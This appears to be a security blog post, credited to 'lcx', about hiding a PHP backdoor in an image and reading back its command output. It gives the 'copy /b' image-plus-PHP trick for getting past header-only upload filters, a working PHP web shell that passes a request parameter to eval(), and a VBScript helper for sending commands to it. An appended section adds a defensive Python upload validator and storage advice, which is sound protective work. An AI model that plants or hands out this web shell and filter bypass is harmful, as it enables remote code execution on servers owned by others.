Getting command output back from a PHP backdoor embedded in an image
Author: lcx
Some sites do not check the file extension but check the file header very strictly: a bare gif89a header will not get past them, so the only option is copy /b 1.gif+1.php 2.php. But then a one-line PHP trojan or an include-style payload gives no output back. And with PHP code embedded in an image, if you do not know which directory on the site is writable, it is also hard to write a file up there.
Of course you can see the output by capturing the packets and submitting them with NC, but that is too tedious. The code below only counts as a PoC.
php:
<html><body bgcolor="008888">
<font face='arial' size='3'>
COMMANDE PHP :
(pas de ";" à la fin )
<form method="get" action="commande.php">
<?
$com=stripslashes($com);
echo"<input type=text size='100' name=com >";
?>
</form>
<?
echo "<font face='arial' size='3' color='lime'><b><i>$com</b></i></font> <br>";
$result=eval($com.";");
echo"<br><br> et <b>$result</b> " ;
?>
</body></html>
vbs:
url=URLEncoding(Wscript.Arguments(0))
Set oXMLHttpRequest = CreateObject("Msxml2.XMLHTTP")
oXMLHttpRequest.Open "GET", url, False, False
oXMLHttpRequest.Send
'str=oXMLHttpRequest.responsebody
set aso=createobject("Adodb.Stream")
aso.open
aso.type=1
aso.write oXMLHttpRequest.responsebody
aso.saveToFile "c:\ok.htm",2
aso.close
Set WshShell = Wscript.CreateObject("Wscript.Shell")
WshShell.Run ("C:\Progra~1\Intern~1\IEXPLORE.EXE "&"c:\ok.htm")
Function URLEncoding(vstrIn)
strReturn = ""
Dim i
For i = 1 To Len(vstrIn)
ThisChr = Mid(vstrIn, i, 1)
If Abs(Asc(ThisChr)) < &HFF Then
strReturn = strReturn & ThisChr
Else
innerCode = Asc(ThisChr)
If innerCode < 0 Then
innerCode = innerCode + &H10000
End If
Hight8 = (innerCode And &HFF00) \ &HFF
Low8 = innerCode And &HFF
strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
End If
Next
strReturn = Replace(strReturn, Chr(32), "%20")
URLEncoding = strReturn
End Function
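The post's opening observation is that an upload filter which only inspects the file header accepts an image with PHP appended to it. As an added example (not part of lcx's post, and not any particular site's code), here is a server-side upload gate in Python that layers three independent checks: an extension allowlist, a magic-bytes check tied to that extension, and a scan of the whole body for a PHP open tag, plus a GIF-specific heuristic for data after the GIF trailer. The function names `check_upload` and `gif_has_trailing_data`, the constant names, and the sample bytes are all my own construction; the 1x1 GIF is a constructed minimal image and the appended payload is a harmless `echo`.

```python
import re

# Allowed extensions and the image signature (magic bytes) each must start with.
ALLOWED_SIGNATURES = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# PHP open tags. A bare "<?" is only counted when followed by whitespace so
# that random pixel bytes containing "<?" do not trigger false positives.
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=|\s)", re.IGNORECASE)


def gif_has_trailing_data(data: bytes) -> bool:
    """Heuristic: a well-formed GIF ends with the 0x3B trailer byte.

    Anything after it (for example a concatenated second file) means the
    stream does not end on the trailer. This is a cheap secondary signal,
    not a parser; the tag scan below is the primary check.
    """
    if not data.startswith(ALLOWED_SIGNATURES["gif"]):
        return False
    return data[-1:] != b";"


def check_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for an uploaded file.

    Every check must pass; the header check alone would accept
    a copy /b image+php polyglot, which is exactly the gap the post describes.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_SIGNATURES:
        return False, f"extension '{ext}' not allowed"
    if not data.startswith(ALLOWED_SIGNATURES[ext]):
        return False, "magic bytes do not match extension"
    match = PHP_OPEN_TAG.search(data)
    if match:
        return False, f"PHP open tag at offset {match.start()}"
    if ext == "gif" and gif_has_trailing_data(data):
        return False, "data after GIF trailer"
    return True, "ok"


# Constructed sample inputs: a minimal valid 1x1 GIF, and the same GIF with a
# harmless PHP snippet appended the way "copy /b 1.gif+1.php 2.php" would.
MINIMAL_GIF = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
    b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00"
    b"\x02\x02D\x01\x00;"
)
POLYGLOT_GIF = MINIMAL_GIF + b"<?php echo 1; ?>"


if __name__ == "__main__":
    for name, blob in [("clean.gif", MINIMAL_GIF), ("poly.gif", POLYGLOT_GIF),
                       ("shell.php", b"<?php echo 1; ?>"), ("fake.gif", b"<?php echo 1; ?>")]:
        print(name, check_upload(name, blob))
```

Passing this gate only means the bytes look like an image; the durable fix is to store uploads under a server-generated name outside the web root (or in a directory where the web server never hands files to the PHP interpreter), so that even a file that slips through is served as static data rather than executed.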